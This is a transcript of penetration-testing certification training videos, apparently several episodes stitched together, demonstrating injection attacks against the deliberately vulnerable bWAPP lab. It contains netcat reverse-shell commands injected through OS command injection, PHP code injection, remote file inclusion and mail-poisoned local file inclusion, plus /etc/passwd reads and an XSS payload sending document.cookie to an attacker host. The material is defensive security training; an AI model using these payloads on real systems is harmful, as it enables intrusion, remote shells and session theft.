All right, well, that's plenty of information when it comes down to SQL injection. Let's go ahead and do a quick review of some things we've seen in this episode. Dan went ahead and showed us the idea of testing for SQL injection, as well as some of the different kinds of SQL injection attacks, error-based, blind-based, and describes stack queries, as well as showing a great little demonstration here of SQL map. So that actually gives you quite a bit of material to go through when it comes down to those different attacks. But that doesn't mean that we are done for PenTest Plus. There's plenty more to come, so make sure you join us right here. That's right, we want to talk. That's right. We are back once again with more PenTest Plus, and we have Daniel Lowry here. And of all the things we have separated out, right? We said, hey, SQL injection attacks we kind of covered before, and we need to talk about all the other injection attacks here. So, Daniel, there's actually quite a few for us to actually kind of work through. So, where are we going to begin?
We're going to begin with, we're going to do command injection. We're going to do code injection. We're going to take a look at, I like the words file inclusion more than I do file injection, but you might hear it that way, and that's how they label it for your objective list for CompTIA here. But file injections, very interesting stuff. And we'll talk a little bit about LDAP injections as well. There are plenty of different types of injection attacks out there, other than SQL, obviously. It's probably the most notorious that we know of, but these other injection types can really be helpful when you don't have SQL injection available. You might find one of these, and I've definitely found these useful in my own experience, so I hope I can give that knowledge to you.
Yeah, it's real easy to be pinpointed and targeted on just SQL injection, but then not to think about the very fact that there may be other opportunities for us to get into systems as well. So when we start talking about this, we're going to begin with the idea of a command injection. Help us out to understand what that actually is.
All right, so real quick and dirty, command injection is you have an operating system. It takes commands, right? Ronnie, you've used Windows before? You've used Mac OS?
I have.
You've used maybe a little bit of Linux?
I have.
Right? They'll have a terminal, right? And you can, in those terminals, give it commands to do things. Fun, right? We like that. It's called using a computer. We like that. What if I told you that you might be able to, through a web application, inject, or in other means as well, but usually through a web application, inject commands to say, hey, not only just do the thing you do, but do this too while you're at it. I mean, since you're cooking, why don't you make me some of this? And he goes, okay, I'll do that. That's what we mean. We're going to run other commands than the ones that are intended to be ran by your web application. This happens a lot of time because the person that creates the web app is reaching into the system to do X, Y, or Z functions instead of coding out that specific function, because that can take a long time. It's easier. If my operating system already does, dates and times, why reinvent the wheel? Just say, hey, operating system, give me the date and time, and then feed that back to the user. Excellent. That's a whole lot easier to accomplish than it is to build that from scratch, especially if there's not like a built-in function for whatever programming language you use. So that's why we see this. So I guess the next question becomes, okay, well, how does that look practically? So let's jump into the computer. I got the BWAP up. Love the old BWAP and the other systems you can play around with, like DWA, multi-day, all this kind of stuff. You can find out. They'll usually have a command injection function there as well. But we'll stick with BWAP today. And right on the top of the list, we have OS command injection. Hey, look at that. You also notice there's a blind one. Right. Blind, same idea as with SQL. Blind SQL. It's just that I don't see any kind of output to let me know whether or not I'm being successful. So I kind of use some sort of functionality to push that issue, make it respond slowly, or so that I understand, oh yes, it's actually doing the thing I want it to do. That's the same idea with command injection here. So we just want to see how this works. OS command injection, hit hack. Let's see what we got here. It looks like it's doing a DNS lookup. It's got www.nsa.gov. You click lookup. And I don't have to connect to the internet, so it's going to eventually time out, take a second. But I can't really, what's going to be interesting, what I'm interested to see is, should I say, is the output that comes back to the screen. And that's what's really going to kind of kick me into, maybe we've got ourselves a command injection here. It might be nice for me. So let's see here. We see connection timed out, no servers to be reached. This really looks like some command outputs. What's a normal command output for something like dig or host or NS lookup? It might be using one of those tools from the system to perform the DNS lookup function. Now, how do we actually inject commands? That would be the next question on our list. A couple ways of doing this. Ronnie, have you ever made a one-liner before?
I have not.
You have not? Okay, great. That means you might be in the same position as these good folks out there.
Absolutely.
Right? So I like this. So do you know what a one-liner is?
No, I don't.
Get even better. Ronnie's a fresh newbie. I'm about to teach him something awesome that he's going to be able to use in real life, and so will you if you've never done a one-liner before. One-liners are basically a string of commands put together instead of having to do them one at a time. Okay, right? Hence the idea of a one-liner. It's all in one line. Very fun. Well, how do I make this command run and then this command run? That's the question. Guess what? That's what we're going to do here. There's a couple of different characters that will help us do that. One of them is going to be the semicolon, right? So in most operating systems, if you use a semicolon, it will string commands together. Run this one, and it'll see a semicolon. Go, oh, you got another one. Let me run that one. If there's another semicolon, I'll run the one after that, so on and so forth. So let's add a semicolon to this and see what happens. We'll do a semicolon, and this is a Linux operating system, so got any favorite Linux commands you want me to run? LS. Well, LS it is. LS, and I will do the lookup. Now, what's going to happen? As we can see, the BWAP is busy trying to do a DNS lookup for www.nsa.gov, which eventually, as we saw, will time out. It does take a hot second here, but once it does that, which it seems to have completed, it should then also run LS. What's cool is that output doesn't just kind of go off into the ether. It gets pushed back to the user at the web application. And there you go. We can see connection timed out, no service can be reached. Admin aim.php, capture bypass.php. These are the files for the directory that this application sits in. Nice. Now, this is a little ugly. I'm going to run burst suite in the background here. And if I grab that command.php and look at that response, we can see it a little bit nicer when we kind of look at the response code. And as we scroll, look at that. There's all those files. Looking a little bit more nicely formatted for us. So that's awesome. So we know we have good code injection. Now, sometimes there's some filtering that'll be involved. So try a couple of different things. If we go back to the BWAP, you can do, and I'll kind of zoom in. I won't actually fire these off, I'll just show them to you. So obviously you can use a semicolon, but you also might be able to use two semicolons. Okay? One semicolon might be being stopped, right? Filtered. So that might work. You can use an ampersand, right? This and that. If that doesn't work, you also can do a logical and operation, like where's that Boolean, right? So double ampersands might be the way to go on this. A lot of times the pipe works for you. So I'm piping from one command to another. Even though that doesn't really work in this scenario, it still runs both of the commands, right? So pipes might be a good one. There's a couple others out there, but those are the ones right off the top of my head. They're usually really good. Semicolon, double semicolons, ampersand, double ampersand, and a pipe character. Sometimes you can also do a logical or. There's another one off the top of my head. Two pipes. Say this or that. So give it a command that doesn't run. So it will default to the or statement. Try to get that one to run. So there you go. That's how you can do some command injection here. Of course, we can get a little nastier with this if we like. Ronnie, should we get nasty?
Absolutely.
Okay, nasty it is. Ronnie, it was Ronnie's call. Don't blame me for what we're about to do. So let's get a netcat listener going on here and see. I like to netcat. So dash nvlp, VALP. There we go. I'll put on port 999. So now it's listening for incoming connections. What am I doing? I always do that, and it's always the wrong thing. I don't know why my head won't stop me from doing that. But I'll put that semicolon in there, and I'll do a netcat dash nv dash e bin bash. So basically, trying to create a network connection with a bash shell going through it. That'll be fun if this will allow, of course. I've given an IP 192.168.241.1.1 is my IP. I have port 9999 open. Hit the old lookup. And again, we'll see if nesting occurs as it, we wait for the timeout. So much fun. Right? So is that pot ever going to cook? You watch pot never boils kind of thing.
Right.
But eventually it doesn't take too long. Right? Was it 10 seconds? Yeah, maybe 10, 15 seconds. 5, 4, 3, 2, 1, 0. Go, please. Just still waiting for that timeout to happen. Oh, you know what? Actually might be done. Oh, it is done. Look at that. Connection from ID. We got nasty. We're host name. Host name. If you can spell it correctly. B-Bucks. Right? So command injections can obviously be very, very bad for people running web applications. Very, very good for us as pen testers. So we can go, hey, got me a shell. Always love that. It's good at reach. So there you go. Command injection.
All right, now the next one we're going to talk about is code injection, but it sounds fairly similar to the command injection. Are they fairly similar?
It's fairly similar. So instead of obviously running some sort of system commands, we're going to inject actual code. Right? So whatever platform it is that you're running, you want to give it code, and it will interpret it instead of as a string of just random text. It'll say, this is code, and it's my kind of code. Let me run that code for you. So hopefully the danger of this starts to make itself apparent. You know what I'm going to do? I'm going to fire up yet another netcat listener because we're going to come back to it. And let's come over here. We do have, guess what? PHP code injection, attack your own BWAP, hit hack. We look at the application. So this is just a test page reflecting back to your message. Your message is in a link. I'll click the link, and it says test. All right, as I like to do, I look in the URL. Let me bring it to you. It says message equals test. Okay, well, this is a PHP application. Right, now we're getting a little handhold here, right, because it does say it's a PHP code injection. We know that for a fact. But if you see something like something equals this is where you want to start testing all these different types of things that we like to do. So I'm going to test some PHP. I'll make sure that I actually can run PHP. So PHP info, bing, hit that. That's actual PHP code. Bring the info page. Did it do it? Let's see. Oh yes, it sure looks like it did. We can see that information there. There's the PHP info page. So that is actually running the code for PHP. Excellent. I like running code. Code running is fun. Let's run more code. Run more different code, shall we? Let's run some PHP shell _ exec, and we'll do the same thing. Let's do what is it, nc-nv /bin dash e /bin /bash, which means execute. Right. So it's going to run bash shell on 192.168.241.131 port 999. Finish that off. A little bit of that action, like so. Hit the go-go's. Let's hello. There we go. Let's go over to this and look at that. It executed the PHP code that I gave it, which gave me shell execution, which was kind of fun because we used PHP code injection to run a command injection because I had PHP say, hey, ask the operating system if it runs for me, and it did. So there you go, code injection and command injection all rolled into one.
All right, another particular type of injection attack is going to be a file injection here, and there's actually even some subtypes of this. Right?
There are file injections or inclusions is what you typically hear them called. Are very, very fun if you find these. Excellent little source of fun is here. What they do is they say we have two types. Right? Remind you, there's some subgenres here. You have remote file inclusions and you have local file inclusions. A remote file inclusion being, hey, there's a file out here in the nowhere lands. Why don't you go ahead and grab that file and use that for this website? Whereas a local file inclusion means, hey, web application, look for this file in your file hierarchy here. They got a disk. Look on the disk, see if this file exists. If it does, show it to me. Right? That's the idea. Let's take a look at both these things here, shall we? So I'm going to do a remote file inclusion first. Let's grab this. I think it's under our yeah, there we go. It is right there. Remote and local file inclusion. Hit hack. Yes, this does look a lot like our SSRF system. And now if you have watched that episode, you know what happens there. All right, click go. And I can see, okay, great. So thanks for your interest in DWAP, but up in the URL, as we know, this is where things get hinky a lot of times. Sometimes stuff is hidden in the body of the post request. But here it is right here in the URL, so it makes things easy for us. Language equals lang_n.php. All right then. What do we do with that? Well, it's pulling a PHP page. Can I pull a remote page? Like http://192.168.1.131, which is my attack machine, which I'm going to put on port 8000, and I'm going to grab a random file. It's going to be called php revshell.php. It's right there. Let's go prepare that, shall we? Let's see, that's there. We'll come back and we'll hit go in just a second, but we gotta prepare that. How do we do that? Well, I need to serve that PHP page up. I'll do that with Python, so Python 3 -m http.serve. Oh, that's in the wrong spot. Helps if I go to the right place. So this is, actually, let me split the screen here. Split the screen. We'll go, there we go. And I will bump that. Oh, there we go. Here, I'm gonna go to I have this in tools, / sometimes, what am I doing? I'm in the wrong spot. There we go. CT tools. It's fun to type running. Yes, sometimes shells. And in there, I've got a bunch of different shells that I created. This one is PHP revshell.php. Now, we gotta make sure all that stuff is actually right, which it is. I've already set that up. I can like head PHP revshell.php. You can see I've got my right IP address. I grabbed this from PenTest Monkey. Just do a Google search for PenTest Monkey. Put the IP import in the right spot, and then I can do my Python trick. Python 3-m http.server, and just hit enter. So now I'm starting that page up. I get my netcat listener going here, nc-nvlp on 999. There we go. It's listening. Go back. Hit enter. Go back. And hey, look at that. We got ourselves a shell. Right? You can see ID, and we do hostname. Excellent day, right? So there you go. That's a remote file inclusion.
All right, now that we've talked about remote file inclusion, what do we need to know about local file inclusion?
So local file inclusion is kind of the opposite, right? I mean, they're pretty self-explanatory. Remote is a remote file is out there wherever, and I'll give you the URL for that. But the local file is it's on this disk. It's right here, and we just gotta, hey, can you reach out and grab that file from the disk and display it for me? Yeah, no problem. That's what we're looking for. So interesting stuff. We can come back in here. I'm just gonna change the URL again. This time I'm gonna wipe out all that HTTP business because I'm not reaching out. I'm gonna look locally now. It's a little small. Just scrolled in just a little bit better. Now I'm gonna give a like /etc/password, right? It's always a good file to go for testing purposes because it's typically world readable and it exists somewhere else other than most people are logging into Etsy. Yeah, that's not their home directory. You know what I mean? Right? Web apps are typically not found in the Etsy directory. Right? So I'm gonna give the full path of Etsy password and hopefully it returns that information we need. Hit enter. Get a little bit of that, and we'll see. Did we get? Yep, I can see. There's the known display manager. Blah blah blah. This is all wonderful stuff from the Etsy password file. Excellent. Now I can enumerate users, know where their home directory is. That can be very helpful to further pen test. But it's not the only thing we can do. What other files could be local that I could get? What I like to go for is to see if there's a mail file, because users on Linux systems typically have a mail daemon running of some sort, and they can receive mail. I scanned this box. It does have an SMTP server running, so we can use that to actually inject into their mail file. If we can read that mail file, that can give us some remote shell, right? So what do we do? Let's change this from Etsy password to /var/mail. I'm sorry, yeah, /mail. My user is most likely www-data. I hit enter, scroll down, and see. Oh look, I'm reading the mail for this user. Great, that means I can read that file. If I can slam some PHP in there, well, that'll be good because it'll execute as PHP. Let's go over here. Oh, I'm gonna scroll in. There we go. Let's go over to our terminal. And from here, I'm going to do a telnets of 192.168.241.140, I believe it is, on port 25. There we go. I'm logged into the VBox ESMTP server. I don't need this running anymore, so control C that and exit that. All right. So from here, yes, I know. I'll do the EHLO. Oh, I got the EHLO like Bob. There you go. I know. You gotta give it something. Then it's happy. So we'll do a mail from mail 2. Receipt 2. It's mail from receipt 2. I don't remember my mail command. ESMTP. The mail 2 is going to go to what is it? www-data. There we go. Looks like it was good. Oh no, I didn't like that. Because what do mail from? That's how it works. There you go. I love the helps that they give you. So let's try that. Mail from. It's going to come from. You can tell it's from anybody you like. So if we want it to be from bill.gates@microsoft.com, that's totally fine. You can do that. See, it says okay. It's happy to receive that. And then RCPT2. This is where it's going to go. This is where it goes to www-data. And it says okay, excellent. And then you just give it data. You'll notice it says end your data with a period. That's cool. I'm gonna give this, I'm gonna give it some PHP, right? PHP shell underscore exec. We'll do the old nc-nv-e bash of 192.168.241.131 on port 9999. Close that out with that good stuff. Making sure everything looks fine to me. I think it does. End of the period. Mail is queued and sent. Yeah. Exits or quits. Then there we go. And now we'll get that nc-nvlp on 9999. Waiting for hopefully what is going to be a reverse shell. If I did it correctly, that is. Let's reread this mail page. And notice that it's taking a little bit longer. We do have a connection. Yay! Local file inclusions can be bad. If I can inject any kind of stuff into them, I might find myself a shot.
All right, Dan, you previously mentioned a little bit about directory traversal. Help us.
Oh yeah, thank you for reminding me about that. Reminding me exit out of our shell here. With directory traversal, you know, we just read the file, the password file, and it's like, yeah, cool. Sometimes that does not work. Sometimes you need to use a directory traversal attack, which is, hey, get out of the current directory that I'm in and try to then drill back down into the correct directory. That does happen from time to time. So let's show you what that looks like. Let me get this a little closer. Don't be shy. There we go. So if I couldn't read the password, I might need to do this. Dot slash. Not really familiar with the dots.
I am. It actually allows us to go to the parent directory.
That's correct. It pushes you up or back one directory. Ultimately, I'm trying to go back to the root directory so that I can drill back down into the correct area, which would then be sc/password. Fire and forgets, and we see there it is again. Obviously, this wasn't suffering nor needed a directory traversal attack, but you might need that to pull a local file inclusion off. So I want to make sure you're familiar with that here.
All right, now speaking of our last particular attack in this episode is going to be LDAP. What do we need to learn about there?
So LDAP, again, injections, right? The lightweight directory access protocol used by many different systems. It's very helpful for us. Sometimes you can see web applications using LDAP to retrieve information because using LDAP server to do that. Great, awesome. You can also inject into LDAP. I don't have the infrastructure to actually show you LDAP injections, but I did do the next best thing. Found a great blog site that shows you a lot of examples on working with LDAP injections, explaining the process. Got it right here for you. This is at neuralegion.com, right there. Don't worry, that URL will be in your learner resources. A complete guide to LDAP injections with types, examples, and preventions. This is really good from Danko Kovacic. Super good information here. So check this out. It goes through what LDAP injection is, how do they work, the types of different LDAP injections that you might see, and examples. All great stuff. You can just see it's just using LDAP syntax, injecting it into a query through a web application, and then returning those results, bypassing access and authentications. Super cool stuff. So check out that if you want to learn more about LDAP injections. A little bit of time, so it kind of worked out that way anyway. I wish I had the infrastructure to show to you, just didn't have the time or resources to make that happen for this episode. But this is definitely something you want to take a look at and familiarize yourself with when it comes to LDAP injections.
All right, so that actually means it's time for us to go ahead and do a wrap up. And so let's review our key points for this episode. We've gone ahead and also Daniel has shown to you the idea, of course, of command and code injection attacks, as well as file injection or inclusion. You might hear both. And lastly, he discussed the idea, of course, of LDAP injection attacks. All these we've seen demonstrations of them during this episode as well. And that means that there's plenty of more attacks that we have to be familiar with, but those will be in different episodes. So make sure you stay tuned for those episodes as well. And so for don't know much about cross-site. That's right, if you're not sure what XSS attacks actually mean, we're about to find out with Mr. Daniel Lowry here. It is cross-site scripting. We don't know why they chose that. Actually, probably Daniel doesn't know why they chose that. So, Daniel, when it comes down to it, as we get started here in cross-site scripting, this is kind of one of the neat attacks that most people, if they're beginning with pen testing, this is probably like, oh, that's finally the coolest thing that I've started to do.
Yeah, cross-site scripting is one of the more well-known, at least names. And if you're wondering where XSS comes from, it is that as a cross.
Oh, that's right.
Cross.
And then
site scripting. You get it. I'm doing play on Mr. Long. You got me on my heels with that one. Anyway, there you go. That's where cross-site scripting comes from. So it is a very important thing. If you ask any bug bounty hunter, they'll tell you cross-site scripting pays the bills. Honestly, this is how they make the majority of their money because they're very prevalent. What we're going to show you today is how to test for cross-site scripting. Ultimately, when we get into like session attacks and things like that, we'll show you how to use cross-site scripting to perform. So we're going to learn the techniques today that we need to know, and that's going to set us up for success in subsequent episodes.
All right, so let's say it's been a while since we've actually heard this terminology. So Daniel, can you remind us again what we're actually going to do? You told us.
Okay.
What is it actually?
Okay, so what is cross-site scripting? Define the thing, right? Absolutely. So cross-site scripting is what it does is it'll when you find your own website, right? And you're allowed to input data. Oh no, there's that user input we love so much. Right? You're inputting things. And the input box says, I'll take stuff. What can I put in that input box? Can I put numbers? Can I put special characters? Can I put letters? Upper, lowercase? What's the parameters around my my input box here? Well, if it takes things like specific special characters, well, I'm thinking specifically of the greater than less than, like I was eating a giant hamburger, right? But no, it's the greater than less than signs. I might be able to inject script tags. This is JavaScript. That's the idea of scripting. Okay. When it comes to your HTML content, sometimes it is going to be dynamic. It will be changing. You can do stuff with it and work with it and have it take in information and then reflect that back out or make changes to the web page that you're looking at or give information into the next page you're going to go to. That's what cross-site scripting tries to take advantage of, the fact that there are dynamic elements, typically written in JavaScript, that are in this page, and if it takes information from me, will it interpret any JavaScript that I feed it? That's what we're going to try to do today. We're going to try to test whether or not these web applications are interpreting input as JavaScript, because we're going to inject some JavaScript to see what it does.
All right, so when it comes down to the idea here of doing it, is there only one way to actually do the JavaScript type attack?
No, there's absolutely not. There's a couple ways in which you might actually see this. For the purposes of the exam, they call out reflected and stored. There's also DOM-based, but that's on their objective list, so we'll leave that to you to and enjoy. I'm just going to do what you need for your exam because there's a lot of information that goes into this exam anyway. I don't need to overload you. But and a lot of times you are working with reflected and stored based process scripting. So we say, right, we'll start with reflected type attack.
Absolutely.
You like reflected?
Let's do
What do you think reflected means?
It means it bounces off of me and goes to you. Like an insult, you know,
Yeah. I'm rubber your glue. Welcome back to third grade. ITProTV style.
That is me all the time.
But it is kind of right. It is bouncing back. That's what we mean by reflected. But how does that look in real life? That's really the question. So let's jump into the CompTIA. And I've got the lovely BWAP, as everybody knows the most, right? If you're working in a practice labs environment, this is probably what you're looking at, staring you right in the face, and you're going, I'm with you. This is a great good time. I love this thing. So if you look down here when you drop down to your choose your bug, you should have some, wait for it. Hey, look at that cross-site scripting. Now I know it's a little small, but you can see there's different reflected types of attacks. Quite a few of them actually, in many and some different ways. We can look at that, and then there's some stored ones as well. They're at the bottom of this list. So great, that's awesome. Now we have at least some demos we can play with. Let's go back up to the top of this list. Let's just grab that first one reflected. Just keep things simple so you can see how this works. And I'll hit hack, and I'll push this away from us. And then here we go. We have our first and last name entry boxes. So here's our input fields. I can put in my first name, which is Daniel, last name Lowry, and hit go. When I do that, I get this welcome Daniel Lowry. Good output. So what did the website do? It ingested user input, right? It formatted it, and then it reflected it back to the user on the page. I'm seeing that information right there. So if I put Ronnie Wong in here, it'll say welcome Ronnie Wong. If I put ITProTV user, it'll say ITProTV user. Or remember, I guess we call people out there. I'm so used to working in computers, I think everybody's users. But it's reflecting that back to the page. Now that's a really simple way to find it. It's weird and where things will get reflected back. So you got to keep your eyes open and maybe do some search and things of that nature for the thing that you inputted to see if it is reflecting back in the page somewhere. Sometimes looking in the source code is a great place to go because you never know. Even though you might not see it, it still might be there. You know what I'm saying? You don't want to overlook anything. But now that I know that's reflecting back, I want to know, can I inject JavaScript at this point? So what I'm going to do is I'm going to say script thing, and I'm going to say alert. What should we have alert running? What should we make it say?
I don't know.
But XSS.
Yeah,
all right.
why not?
Bam, XSS all day long. All right, close my script tag. Oop, script. And I'll put my last name of Lowry. There we go. I will hit go, and whoa, you'll notice this alert pop-up box just jumped in the middle of the screen. Oh my goodness. How about that? Why did that happen? And you'll notice it says exactly what we told it to say, XSS. What it did was it took that script information, and when it saw that, when the back-end web code started looking at this and went, I've got some JavaScript here. Let me execute that. And there you go, we get execution of JavaScript. So that is a reflected cross-site scripting type. Now, that leads us to the next one, which is stored. Stored. Thank you for reminding me. Stored cross-site scripting. Now, I know Ronnie likes reflected cross-site scripting. I'm more of a stored cross-site scripting guy myself, and you'll find out why when we get into some other episodes. Because, well, I can tell you now, I guess. I like stored because if I come back to this page, right, so we got this here, right, just as welcome Lowry, with reflected, it's a kind of a one and done thing, right? I have to go back in, re-inject JavaScript, and it doesn't really, I mean, that's just a test just to see if it works. How we end up using this is typically with social engineering and session stealing and things of that nature, so we're gonna get into that in other episodes. But with reflected, how do I work that? Well, I have to create a malicious URL that has that reflected cross-site scripting attack in it, because if you look at the URL to do that, you can see there is my script information. Sometimes that's in there. Bing, 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 right? I could craft this URL, then do all sorts of stuff, pass that to Ronnie, clicks the link, and it does something bad, okay? Whereas stored is anybody that goes to that page, I can just give you a good URL. Just go visit the page. Or anybody that normally goes to the page, and that malicious JavaScript is there, they will get hit, no matter what, right? As long as you visit the page. And you have scripting enabled in your browser. If you have scripts turned off, well, then obviously this is not going to work, which is a security feature and remediation for keeping you out of the weeds when it comes to cross-site scripting. So let's go to a stored cross-site scripting attack and see what that looks like. Scroll. There we go, scripting, and then saw that one. Let's do the stored blog and then hack. I like it because it's like a narrative. All right, let's see here. In stored blog, we have, wait for it, a blog post. Let me just kind of zoom out, I guess, a little too much information for us. And it's pretty simple. You go here and go, this is a post. You hit submit, and now we can see there's my post right there. By B, this is the post. That's the user I'm logged in as. That's the date and time that I submitted my post, and this is the post itself. It's kind of like almost like a comment section or a guest book. You remember those? We were really popular for a while. You're able to write something in and leave it, and anybody that goes to that site will then see that. Cool. Is it really cool? Hopefully it is. I've got a feeling because you have holding my hand telling me there's a cross-site scripting problem here. You might want to take advantage of it. So I only have one input, so this has got to be where this is, right? So what we got to do is try my scripts, right? Script, alert. We'll do the same thing. We'll do XSS stored like that, just to show that it's different. Close my scrop tags because I love those. That won't work. And then we'll hit submit. Oh, I see a little whoa. Look at that. XSS stored. Now you're like, okay, seems pretty similar to what we just saw, but the real fun is when I delete that and I come back to this page. Let's say I want to just go to this page, I hit refresh. Yes, resend. It keeps doing it, right? Bing. Okay. Oh my goodness. You know. Okay. Well, I'll move away from this page, and I'll go back to that page. Cross-site scripting, stored blog, there it is. Get back, I'll off there it is again. So anytime I visit this page, if this was a malicious attack, a more malicious, crafted piece of JavaScript, then something worse might happen, like I could steal session tokens and things of that nature, and you would be none the wiser. You won't have a pop-up in the middle of your screen. I will just have a server retrieving whatever information I told it to retrieve on the back end, and you're just like, that's okay. You don't even know if stuff's happening. That's the whole danger behind using cross-site scripting. So I can use that in social engineering, like I said, or in some sort of like session attack, going after some sort of session stealing tokens, that kind of idea, and I can use cross-site scripting to make that happen. So it's pretty easy to test for. I do want to show you one more thing. Sometimes there are security, our security set to low. People do put filters in to try to stop this from working, right? So if I set this to high, I have not tested this. Yes, I get it, please. Okay. Can I go to high? There we go. We'll do high and set that. So now we have currently high. This is not. You notice I'm not getting scripts anymore. Right? That's not happening. I'm not getting the pop-up. But if I go here, I've got this lovely little thing. /documents. This is something that you'll need to be aware of if you really want to get into this. Is part of your day-to-day work and your business. What is it? It is XSS-polyglots. Yes. So this is called polyglot. XSS polyglots. What this is a very specifically crafted piece of JavaScript that if there is a way to execute JavaScript, this one command should find it. Right? So you just kind of copy this whole thing. These are two. I got two polyglots here. You just grab that, copy, come over here, drop that. Well, let's go to reflected actually, because it'll be faster. Where's that? Cross-site scripting. Reflected. Go to Bing. Hack. What happened? Did I hit the wrong thing?
I think so.
I must have hit the wrong.
Yeah.
There we go. Try one more time.
Down.
Yeah, there we go. Looks too high there. There it is. So if I come in here and I pop this in here, paste. Remember, we're set to high. Our regular JavaScript should work. Lean on the keyboard for last name, hit go. And you'll notice, that didn't work well. That polyglot must not be good. These are really helpful. Let's try this one, see if it works well. Polyglots are typically pretty successful. If I can highlight like a normal person. Copy. Go back. Paste it in there. Paste. Hit last name of whatever. And go. Oh, it didn't work. Well, that's good. That's good to know. Maybe I need to polyglot. Polyglots are great for testing. I just want to kind of show you that and give you that capability. Just do a Google search for polyglots. There's a bunch of them out there. These aren't the only ones. These are just the two that I kind of have and typically work for me. But apparently the high level security in this is probably actually turning off all JavaScript. So no matter what you do, it's not going to work. But depending on the level of security that's implemented, these will definitely help you suss out some stuff that standard regular testing might not. So I just wanted to make you aware of those and give you a little real world tool that could be helpful.
All right, Daniel, thank you for showing us that example of the idea here of using cross-site scripting, a key tool that you actually want to have as you start your pen testing career as well. So Daniel set the examples for us as well as giving us some context that we can use them in to make sure you pay attention there. But there's plenty more to come when it comes down to CompTIA's PenTest Plus, and you want to make sure you stay tuned for that, and we'll see you in the when it comes. That's right. Welcome back to our jam session here on PenTest Plus. I'm here, of course, with the artist, Daniel Lowry, and he's going to jam. No, not really. We're going to talk about sessions. Yeah, you could, and you definitely could do that. But we're going to talk about the idea of sessions here and the different attacks that we can actually do with sessions as well. So, Daniel, again, it may have been, I'm going to use it for a hot minute, that we've actually talked about what a session is. So, in other words, you start talking about something, goes, I wonder what that actually means. So, Daniel, I'm going to actually just give us a little brief, 2-minute coverage here of the idea of what a session is, and then you can actually lead us on how the heck we actually use that in attack.
Okay, well, the elevator pitch on what a session is basically when you go to a website, typically where we use this, it's not the only way in which it's done. There are other services and websites that use sessions. But in penetration testing, you're going to do a lot of web application penetration testing, and therefore sessions are going to be a part of that. A session is, wait for it, it is the thing that identifies you and me as me. All right, right? Yeah. So that way, when Ronnie's logged in, you're logged in, I'm logged in to the same website, it sees us all as different people because, bear with me, Ronnie, if we were all logged in as the same person, to the website, if it just saw us all as one big user, if you did something bad, right, how would we attribute that to you? You couldn't. Yeah, can't do it. That's a problem. right. Or think of things like banking, right? Online banking would be really weird if Ronnie and I and you all shared the same bank account. How do I know whose money's whose?
Yeah,
right? And,
impossible.
right, you could not really create any kind of wall between Ronnie's money, your money, and mine. So that's an issue. So we use sessions to help the website understand, well, this is Ronnie, and Ronnie only has access to these things, which are his, or these services which we provide him, he is paying for, or whatever, right? And if I log in, I get only access to this account because that session is now connected to that account. And because I've authenticated myself as me, I get a session token. That token validates me in that web application for the things that I'm allowed to do.
So when I make a connection, I get my own token, and you get your own token, and that should keep our traffic separated in that way.
Absolutely. And as you work your way through the web application, that token follows you along, right? So as you move from one page to the next, the token verifies, do you have access to said page? If so, what functions and features should you have access to in that page? You start to get the idea. So as I continue along through the web app, that token is my ticket to ride all the rides that I'm allowed to ride. Okay, makes sense? sense?
Makes sense.
So-
yeah, so Daniel, when it comes down to it then, okay, the very fact that we understand how that works,
Yeah.
how do we take advantage of that? I think one of the weird terms that we're going to start off with is the idea of session hijacking. How do you hijack my session?
Typically, right, you're not looking at your session token. The app does it for you. Your browser's going to maintain that information and kind of moving along for you. So it'd be hard for me to get it from you. I could do that. That's possible. It'd be an odd way of going about it. But it is a viable attack against your session where I physically come up to you, put you down on the computer with threat violence, and say, open the browser, log in, and then shift control I, look at the storage area, grab that cookie, and because that's a lot of times where they go. Their sessions are stored cookies. Okay, so those tokens are in there. That'd be one way to go about it. We're going to go with a little, probably a less intrusive way and kind of more insidious, which is I'm going to use cross-site scripting. Okay, yeah, cross-site scripting is a great way to grab session cookies. Let me show you how to do that, shall we?
Sounds great.
That sound fun?
It does.
All right, let's jump in. So I am logged in as, I don't know if you can see this, it's kind of a horrible red on black here, but you'll notice I'm logged in as hacker. Created a user, hello hacker. Hey, good stuff, right? Because I'm not going to be able to log in as the other people in this application. At least not yet. That's the idea. All right, so from here, since I'm logged in, I can grab these do your bug thing. Let's go grab one of those stored cross-site scripting attacks. Because remember how I used to talk about so much how much I love stored cross-site scripting? This is why. Because I can do session hijacking fun. All right, so now that that's here, I'm just way too zoomed in here. There's this blog, right? Lovely thing. And I can do cross-site scripting. We already tested it for that in the cross-site scripting episode. It is vulnerable to cross-site scripting, so great. Now I just got to do the right cross-site scripting attack so that I can steal session tokens. Yeah. How do we do that? Well, what I'm going to do is I'm going to do my little script tags like so, and I'm going to create an image. I'm going to tell it the image resides on this web page. So go grab an image from here. Right? So that's the basics of what we're doing now. So I'm saying new image, and it's like this, and then .src, that's source, equals what? Well, it's going to be my attacking poly box, right? Because that's where I can retrieve things from. This might be a server I have online that's more easily accessed or actually looks like something that wouldn't be malicious. But for our intents purposes of demonstration, it will be the poly box, which is at http://bang 192.168.241.131, I believe it is. And I'm just going to tell it to look for a web page, just like bogus.php, and I'll tell it, pwned equals, and this is where I'm going to cut it off. Okay, right? So it's looking for this web page, and I'm going to tell it to add the document.cookie. Scroll over there, cookie. Like that, and then finish this off with a little semicolon and close script tags, which should be, I'm just a little too zoomed in, get it all on the page. There we go, finish those script tags. All right, so now that I have this, once I hit submit, there will be a cross-site scripting session that's going on there that I can start stealing people's session tokens. So let me bring up the terminal here, let's get that going, make that a little bit easier to see, and then we'll just sudo python 3-m http.server on port 80, which is why I need sudo, put in the pass. If I can do it correctly the first time, which I usually can. There we go. So I'm serving now on port 80, which is exactly what I was looking for. So once I come back to this and I hit submit, that should now have an entry, which we see. You'll notice I don't see anything there, right? Because I didn't really grab an image, so there's no image to show. So there's nothing there, it just looks blank, like a blank entry. Good for us, right? Stealth, it's all that stuff. But if we jump back into our terminal, you'll notice I can see my session ID is right there. Right? Because as soon as I refresh the page after hitting submit, it grabbed my session ID using cross-site scripting attack. Hey, cross-site scripting for the win! So now I just have to wait for people to browse to this page. Once they do, I can use this as basically a log of session IDs that I think would be awesome to have. All right, so now that's there, let's jump up here. And really, we have this. We have technically successfully stolen a session. Okay, right? We have hijacked a session because I guess not. I've hijacked my own. Okay. I'll hijack somebody else's. Right. So let's see if we can get this. This is as you can see, I'm logged in as B here, right? And I will go to that page. I will say yes, I would like to go to the cross-site scripting. Where's that page? Boom. There it is. Store blog. Hit that. Hit hack. Let me get zoomed out. Here we are. And I'm like, okay, I don't want to submit anything. I actually want to add. I want to show because I want to see the other people that have the blog. Cool. I do see that some person named Hacker put no entry in here. That sounds great. Well, put our hacker hat back on. Jump back into 